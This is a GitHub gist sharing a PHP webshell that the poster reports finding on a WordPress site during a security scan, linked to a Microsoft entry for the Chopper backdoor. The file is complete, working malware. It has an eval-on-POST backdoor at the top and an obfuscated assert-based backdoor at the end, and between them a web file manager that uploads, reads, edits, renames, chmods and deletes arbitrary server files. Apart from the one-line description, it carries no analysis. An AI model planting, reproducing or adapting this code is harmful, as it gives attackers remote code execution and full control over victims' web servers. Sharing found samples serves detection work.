Created
February 27, 2020 22:26
-
-
Save rolandinsh/3dcdab8c2bcd01f1ac0115e82c79db65 to your computer and use it in GitHub Desktop.
WordPress proxy script found via security scan https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor%3aPHP%2fChopper.B!dha&threatid=2147735632
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php @eval($_POST['wei']); ?> | |
| <?php | |
| set_time_limit(0); | |
| error_reporting(0); | |
| if(get_magic_quotes_gpc()){ | |
| foreach($_POST as $key=>$value){ | |
| $_POST[$key] = stripslashes($value); | |
| } | |
| } | |
| echo '<!DOCTYPE HTML> | |
| <HTML> | |
| <HEAD> | |
| <link href="" rel="stylesheet" type="text/css"> | |
| <title>Webshell</title> | |
| <style> | |
| body{ | |
| font-family: "Racing Sans One", cursive; | |
| background-color: #e6e6e6; | |
| text-shadow:0px 0px 1px #757575; | |
| } | |
| #content tr:hover{ | |
| background-color: #636263; | |
| text-shadow:0px 0px 10px #fff; | |
| } | |
| #content .first{ | |
| background-color: silver; | |
| } | |
| #content .first:hover{ | |
| background-color: silver; | |
| text-shadow:0px 0px 1px #757575; | |
| } | |
| table{ | |
| border: 1px #000000 dotted; | |
| } | |
| H1{ | |
| font-family: "Rye", cursive; | |
| } | |
| a{ | |
| color: #000; | |
| text-decoration: none; | |
| } | |
| a:hover{ | |
| color: #fff; | |
| text-shadow:0px 0px 10px #ffffff; | |
| } | |
| input,select,textarea{ | |
| border: 1px #000000 solid; | |
| -moz-border-radius: 5px; | |
| -webkit-border-radius:5px; | |
| border-radius:5px; | |
| } | |
| </style> | |
| </HEAD> | |
| <BODY> | |
| <center> | |
| <tr><td>Current Path : '; | |
| if(isset($_GET['path'])){ | |
| $path = $_GET['path']; | |
| }else{ | |
| $path = getcwd(); | |
| } | |
| $path = str_replace('\\','/',$path); | |
| $paths = explode('/',$path); | |
| foreach($paths as $id=>$pat){ | |
| if($pat == '' && $id == 0){ | |
| $a = true; | |
| echo '<a href="?path=/">/</a>'; | |
| continue; | |
| } | |
| if($pat == '') continue; | |
| echo '<a href="?path='; | |
| for($i=0;$i<=$id;$i++){ | |
| echo "$paths[$i]"; | |
| if($i != $id) echo "/"; | |
| } | |
| echo '">'.$pat.'</a>/'; | |
| } | |
| echo '</td></tr><tr><td>'; | |
| if(isset($_FILES['file'])){ | |
| if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ | |
| echo '<font color="green">File Upload Done.</font><br />'; | |
| }else{ | |
| echo '<font color="red">File Upload Error.</font><br />'; | |
| } | |
| } | |
| echo '<b><br><br>'.php_uname().'<br></b><br>'; | |
| echo '<form enctype="multipart/form-data" method="POST"> | |
| Upload File : <input type="file" name="file" /> | |
| <input type="submit" value="upload" /> | |
| </form> | |
| </td></tr>'; | |
| if(isset($_GET['filesrc'])){ | |
| echo "<tr><td>Current File : "; | |
| echo $_GET['filesrc']; | |
| echo '</tr></td></table><br />'; | |
| echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); | |
| }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ | |
| echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; | |
| if($_POST['opt'] == 'chmod'){ | |
| if(isset($_POST['perm'])){ | |
| if(chmod($_POST['path'],$_POST['perm'])){ | |
| echo '<font color="green">Change Permission Done.</font><br />'; | |
| }else{ | |
| echo '<font color="red">Change Permission Error.</font><br />'; | |
| } | |
| } | |
| echo '<form method="POST"> | |
| Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> | |
| <input type="hidden" name="path" value="'.$_POST['path'].'"> | |
| <input type="hidden" name="opt" value="chmod"> | |
| <input type="submit" value="Go" /> | |
| </form>'; | |
| }elseif($_POST['opt'] == 'rename'){ | |
| if(isset($_POST['newname'])){ | |
| if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ | |
| echo '<font color="green">Change Name Done.</font><br />'; | |
| }else{ | |
| echo '<font color="red">Change Name Error.</font><br />'; | |
| } | |
| $_POST['name'] = $_POST['newname']; | |
| } | |
| echo '<form method="POST"> | |
| New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> | |
| <input type="hidden" name="path" value="'.$_POST['path'].'"> | |
| <input type="hidden" name="opt" value="rename"> | |
| <input type="submit" value="Go" /> | |
| </form>'; | |
| }elseif($_POST['opt'] == 'edit'){ | |
| if(isset($_POST['src'])){ | |
| $fp = fopen($_POST['path'],'w'); | |
| if(fwrite($fp,$_POST['src'])){ | |
| echo '<font color="green">Edit File Done.</font><br />'; | |
| }else{ | |
| echo '<font color="red">Edit File Error.</font><br />'; | |
| } | |
| fclose($fp); | |
| } | |
| echo '<form method="POST"> | |
| <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> | |
| <input type="hidden" name="path" value="'.$_POST['path'].'"> | |
| <input type="hidden" name="opt" value="edit"> | |
| <input type="submit" value="Go" /> | |
| </form>'; | |
| } | |
| echo '</center>'; | |
| }else{ | |
| echo '</table><br /><center>'; | |
| if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ | |
| if($_POST['type'] == 'dir'){ | |
| if(rmdir($_POST['path'])){ | |
| echo '<font color="green">Delete Dir Done.</font><br />'; | |
| }else{ | |
| echo '<font color="red">Delete Dir Error.</font><br />'; | |
| } | |
| }elseif($_POST['type'] == 'file'){ | |
| if(unlink($_POST['path'])){ | |
| echo '<font color="green">Delete File Done.</font><br />'; | |
| }else{ | |
| echo '<font color="red">Delete File Error.</font><br />'; | |
| } | |
| } | |
| } | |
| echo '</center>'; | |
| $scandir = scandir($path); | |
| echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> | |
| <tr class="first"> | |
| <td><center>Name</center></td> | |
| <td><center>Size</center></td> | |
| <td><center>Permissions</center></td> | |
| <td><center>Options</center></td> | |
| </tr>'; | |
| foreach($scandir as $dir){ | |
| if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; | |
| echo "<tr> | |
| <td><a href=\"?path=$path/$dir\">$dir</a></td> | |
| <td><center>--</center></td> | |
| <td><center>"; | |
| if(is_writable("$path/$dir")) echo '<font color="green">'; | |
| elseif(!is_readable("$path/$dir")) echo '<font color="red">'; | |
| echo perms("$path/$dir"); | |
| if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; | |
| echo "</center></td> | |
| <td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
| <select name=\"opt\"> | |
| <option value=\"\"></option> | |
| <option value=\"delete\">Delete</option> | |
| <option value=\"chmod\">Chmod</option> | |
| <option value=\"rename\">Rename</option> | |
| </select> | |
| <input type=\"hidden\" name=\"type\" value=\"dir\"> | |
| <input type=\"hidden\" name=\"name\" value=\"$dir\"> | |
| <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> | |
| <input type=\"submit\" value=\">\" /> | |
| </form></center></td> | |
| </tr>"; | |
| } | |
| echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; | |
| foreach($scandir as $file){ | |
| if(!is_file("$path/$file")) continue; | |
| $size = filesize("$path/$file")/1024; | |
| $size = round($size,3); | |
| if($size >= 1024){ | |
| $size = round($size/1024,2).' MB'; | |
| }else{ | |
| $size = $size.' KB'; | |
| } | |
| echo "<tr> | |
| <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> | |
| <td><center>".$size."</center></td> | |
| <td><center>"; | |
| if(is_writable("$path/$file")) echo '<font color="green">'; | |
| elseif(!is_readable("$path/$file")) echo '<font color="red">'; | |
| echo perms("$path/$file"); | |
| if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; | |
| echo "</center></td> | |
| <td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
| <select name=\"opt\"> | |
| <option value=\"\"></option> | |
| <option value=\"delete\">Delete</option> | |
| <option value=\"chmod\">Chmod</option> | |
| <option value=\"rename\">Rename</option> | |
| <option value=\"edit\">Edit</option> | |
| </select> | |
| <input type=\"hidden\" name=\"type\" value=\"file\"> | |
| <input type=\"hidden\" name=\"name\" value=\"$file\"> | |
| <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> | |
| <input type=\"submit\" value=\">\" /> | |
| </form></center></td> | |
| </tr>"; | |
| } | |
| echo '</table> | |
| </div>'; | |
| } | |
| echo '<br /> | |
| </BODY> | |
| </HTML>'; | |
| function perms($file){ | |
| $perms = fileperms($file); | |
| if (($perms & 0xC000) == 0xC000) { | |
| // Socket | |
| $info = 's'; | |
| } elseif (($perms & 0xA000) == 0xA000) { | |
| // Symbolic Link | |
| $info = 'l'; | |
| } elseif (($perms & 0x8000) == 0x8000) { | |
| // Regular | |
| $info = '-'; | |
| } elseif (($perms & 0x6000) == 0x6000) { | |
| // Block special | |
| $info = 'b'; | |
| } elseif (($perms & 0x4000) == 0x4000) { | |
| // Directory | |
| $info = 'd'; | |
| } elseif (($perms & 0x2000) == 0x2000) { | |
| // Character special | |
| $info = 'c'; | |
| } elseif (($perms & 0x1000) == 0x1000) { | |
| // FIFO pipe | |
| $info = 'p'; | |
| } else { | |
| // Unknown | |
| $info = 'u'; | |
| } | |
| // Owner | |
| $info .= (($perms & 0x0100) ? 'r' : '-'); | |
| $info .= (($perms & 0x0080) ? 'w' : '-'); | |
| $info .= (($perms & 0x0040) ? | |
| (($perms & 0x0800) ? 's' : 'x' ) : | |
| (($perms & 0x0800) ? 'S' : '-')); | |
| // Group | |
| $info .= (($perms & 0x0020) ? 'r' : '-'); | |
| $info .= (($perms & 0x0010) ? 'w' : '-'); | |
| $info .= (($perms & 0x0008) ? | |
| (($perms & 0x0400) ? 's' : 'x' ) : | |
| (($perms & 0x0400) ? 'S' : '-')); | |
| // World | |
| $info .= (($perms & 0x0004) ? 'r' : '-'); | |
| $info .= (($perms & 0x0002) ? 'w' : '-'); | |
| $info .= (($perms & 0x0001) ? | |
| (($perms & 0x0200) ? 't' : 'x' ) : | |
| (($perms & 0x0200) ? 'T' : '-')); | |
| return $info; | |
| } | |
| ?> | |
| <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['wei']);?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment